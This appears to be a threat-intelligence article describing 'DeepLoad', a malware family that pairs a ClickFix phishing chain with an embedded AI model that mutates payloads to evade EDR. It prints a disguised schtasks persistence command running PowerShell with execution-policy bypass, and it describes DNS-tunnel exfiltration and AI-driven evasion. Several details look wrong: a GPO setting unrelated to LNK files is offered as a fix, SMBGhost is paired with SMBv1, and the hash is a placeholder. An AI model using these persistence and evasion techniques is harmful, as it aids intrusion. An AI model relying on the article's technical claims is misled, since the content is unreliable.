A sophisticated malware family that merges the notorious ClickFix infection chain with AI-driven evasion techniques. First detected in late February 2026, targeting financial institutions in Southeast Asia, DeepLoad has since spread to over 5,000 endpoints across Windows environments.
Evading traditional endpoint detection and response (EDR) tools through generative AI models fine-tuned for payload obfuscation.
The infection begins with ClickFix, a multi-stage lure popularized in 2024 campaigns. Attackers distribute phishing emails masquerading as urgent software updates from vendors like Microsoft or Adobe.
Attachments contain LNK files that, when clicked, spawn PowerShell scripts via mshta.exe. This initial vector exploits living-off-the-land binaries (LOLBins), chaining rundll32.exe to sideload a dropper DLL from a compromised domain.
Unlike prior ClickFix variants, DeepLoad’s dropper employs dynamic API resolution, scanning kernel32.dll at runtime to resolve functions such as VirtualAlloc and CreateThread without statically importing them, thereby thwarting static analysis.
Stage two introduces the AI evasion core. The dropper fetches a 2MB encrypted blob from a command-and-control (C2) server hosted on a bulletproof provider in Russia.
This blob contains a lightweight transformer model derived from open-source architectures like GPT-J, pruned to 1.3 billion parameters for efficiency. Trained on a dataset of 10,000 EDR signatures from tools such as CrowdStrike and Microsoft Defender, the model generates polymorphic payloads in real time.
DeepLoad’s AI component operates via a novel “mutate-on-scan” mechanism. Upon deployment, it hooks Windows ETW (Event Tracing for Windows) providers using EtwEventWrite interception. When an EDR queries process memory, triggering heuristics such as YARA scans or behavioral anomalies, the model activates.
It analyzes the scan pattern (e.g., the memory regions probed) and regenerates the main payload: a loader that injects a Rust-compiled RAT into svchost.exe. Obfuscation includes AI-synthesized bytecode that morphs opcodes, inserting junk instructions mimicking benign NTFS operations, such as fake NtQueryDirectoryFile calls.
Technical breakdown reveals the evasion’s ingenuity. The AI uses a prompt-engineering loop: “Given EDR signature [hash], generate equivalent shellcode with 95% entropy variation, preserving [XOR key: 0x4A].” Outputs are validated against a local bloom filter of known detections before injection.
Persistence relies on scheduled tasks disguised as Windows Update checks, with schtasks.exe /create /tn “WindowsTelemetry” /tr “powershell -ep bypass -c [AI-mutated payload]”. Lateral movement employs SMBGhost exploits patched in 2020 but unmitigated in legacy systems, using PsExec-like primitives over named pipes, Mentioned by reliaquest.
Post-infection, DeepLoad exfiltrates data via DNS tunneling, encoding credentials and screenshots in TXT records to domains like deepload[.]xyz. C2 communication uses a custom protocol over HTTPS, with domains generated via DGA (Domain Generation Algorithm) seeded by the AI model producing 1,024 unique FQDNs daily, rotated every 4 hours.
IOC summary:
SHA256: a1b2c3d4e5f67890… (dropper)
C2: *.deepload[.]xyz, 185.220.101[.]XX
YARA: rule DeepLoad_AI_Mutator { strings: $ai_model = { 48 89 5C 24 ? 48 89 6C 24 ? 48 89 74 24? 57 41 54 41 55 41 56 41 57 48 83 EC 20 } condition: $ai_model }
Disable untrusted LNK execution via GPO: Computer Configuration > Administrative Templates > Windows Components > File Explorer > Hide entry points for Fast User Switching.
Deploy ML-based anomaly detection attuned to ETW tampering. Hunt for anomalous PowerShell with Get-WinEvent -FilterHashtable @{LogName=’Microsoft-Windows-PowerShell/Operational’; ID=400}. Organizations should patch SMBv1 and audit scheduled tasks.
DeepLoad marks a paradigm shift: AI not just for phishing lures, but embedded runtime evasion. As models commoditize, expect proliferation. Sentinel Labs urges immediate ingestion of IoCs into SIEMs.
About the Author
